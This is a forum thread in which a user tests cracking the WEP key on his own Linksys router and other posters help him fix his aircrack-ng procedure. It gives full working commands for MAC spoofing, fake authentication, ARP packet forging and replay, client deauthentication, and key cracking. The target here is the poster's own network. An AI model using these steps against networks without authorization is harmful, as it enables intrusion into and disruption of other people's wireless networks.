Can't seem to crack WEP, despite following instructions

[shadowdude77]

Hi everyone, I imagine you probably get asked this question quite frequently, but I've looked around for an answer to my question and I haven't found anything. I tried cracking the WEP encryption (128- bit hex) on my Linksys WRT54GS' wireless signal using my Acer Aspire One (with the integrated Atheros Wi- Fi chip), but when I reach the final step where I launch aircrack, the amount of IVs never goes above 31. In addition, my interface seems to be very strange. It looks like ath0 is a VAP created by wifi0 or something like that. These are the steps I followed.

- Open konsole
- airmon-ng stop ath0
- ifconfig wifi0 down
- macchanger -m 00:11:22:33:44:55 wifi0
- airmon-ng start wifi0
- airodump-ng ath0
- Press Ctrl+C to stop scan
- airodump-ng -c [channel, in my case, 3] -w wep --bssid [MAC address of AP] ath0
- Open new konsole, leaving old one open in background
- aireplay-ng -1 0 -a [MAC address of AP] -h 00:11:22:33:44:55 ath0
- aireplay-ng -5 -b [MAC address of AP] -h 00:11:22:33:44:55 ath0
- packetforge-ng -0 -a [MAC address of AP] -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y [location of keystream] -w ARP
- aireplay-ng -2 -r ARP ath0
- Open new konsole, leaving both of the old ones open in the background
*NOTE: Up to this point, everything seemed to work similarly to the way it worked in the video*
- aircrack-ng wep-01.cap
*At the part where it says "got x IVS", it never increases from 31, no matter how long I leave it. Does anyone know what was wrong with this method? Thanks in advance for a reply.*

[heimdal]

Sorry, no idea, have you tried isolating different parts of this process from the rest? Kismet, for instance can put you computer into monitor mode (automatically) and also collects ivs (and other things). Does the same problem arise with Kismet? Or when using iwconfig in place of airmon-ng? Perhaps your copy of aircrack-ng results from a bad download, you might try reinstalling it. Finding out what does work ought to help you figure out what doesn't. Please report back to us, I for one am curious about your situation. Good luck, Kurt

[shadowdude77]

Hi, thanks for the quick response. I've tried isolating parts of the procedure, but it seems that everything works fine save for that final aircrack-ng wep-01.cap command. If I try to open Kismet, it gives me this error message:

Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled
Enabling channel hopping
Enabling channel splitting.
FATAL: No packsources were enabled. Make sure that if you use an enablesource line that you specify the correct sources

[shadowdude77]

Hi, thanks for the quick response. I've tried isolating parts of the procedure, but it seems that everything works fine save for that final aircrack-ng wep-01.cap command. If I try to open Kismet, it gives me this error message:

Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled
Enabling channel hopping
Enabling channel splitting.
FATAL: No packsources were enabled. Make sure that if you use an enablesource line that you specify the correct sources

[ShadowKill]

The basic commands I use, after bringing your card into monitor mode and substituting names where applicable, are:

Code:

airodump-ng -c 3 --bssid 00:01:02:03:04:05 -w dump ath0
aireplay-ng -1 0 -e "network-name" -a 00:01:02:03:04:05 -h 00:04:05:06:07:08 ath0
aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 ath0
aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:05:06:07:08:09: ath0
aircrack-ng -b 00:01:02:03:04:05 dump-01.cap

Try those out and see if the same occurs....

[su_pyrow]

add -b to aircrack-ng

aircrack-ng wep*.cap -b (mac of ap)

Hey whats up? Everything looks good. however lets just try something..
these are the steps you took.. lets add --ivs to step #7 just before ath0

airodump-ng -c 3 -w wep --bssid (mac of ap) --ivs ath0

Now... you will have a single and/or series of wep.ivs files. (wep.ivs is from your "-w wep" ABOVE) When it comes time to use aircrack-ng ( 20,000 IVS or so try every 5,000) run it like this:

aircrack-ng *.ivs -b (mac of ap)

That will combine all of them together so you should get more than 31 ivs. You probably already have all the files you need; they just need to be combined to be cracked.

you could try

aircrack-ng *.cap -b (mac of ap)

1- airmon-ng stop ath0
2- ifconfig wifi0 down
3 macchanger -m 00:11:22:33:44:55 wifi0
4 airmon-ng start wifi0
5 airodump-ng ath0
6 Press Ctrl+C to stop scan
7 airodump-ng -c 3 -w wep --bssid [MAC AP] ath0
8 Open new konsole, leaving old one open in background
9 aireplay-ng -1 0 -a [MAC address of AP] -h 00:11:22:33:44:55 ath0
10 aireplay-ng -5 -b [MAC address of AP] -h 00:11:22:33:44:55 ath0
......

See how that works.

[shadowdude77]

Thanks a lot! I was able to follow su_pyrow's modifications to make it work flawlessly. All I did was add --ivs to step 7 and change my final aircrack-ng step to:
aircrack-ng *.ivs -b [AP's MAC address]

I guess now I'll be setting up a WPA network and trying to crack that. Thanks again!

[wewewi]

Hi there!

Im using the very same hardware as you but im a real newbie with linux and i when i fellow your instructions (wich seems to work) i just block at the "LOCATION OF KEYSTREAM" part....

I just dont figure out what it is.


....Im sure someone can help me with that!!!


Thanks!!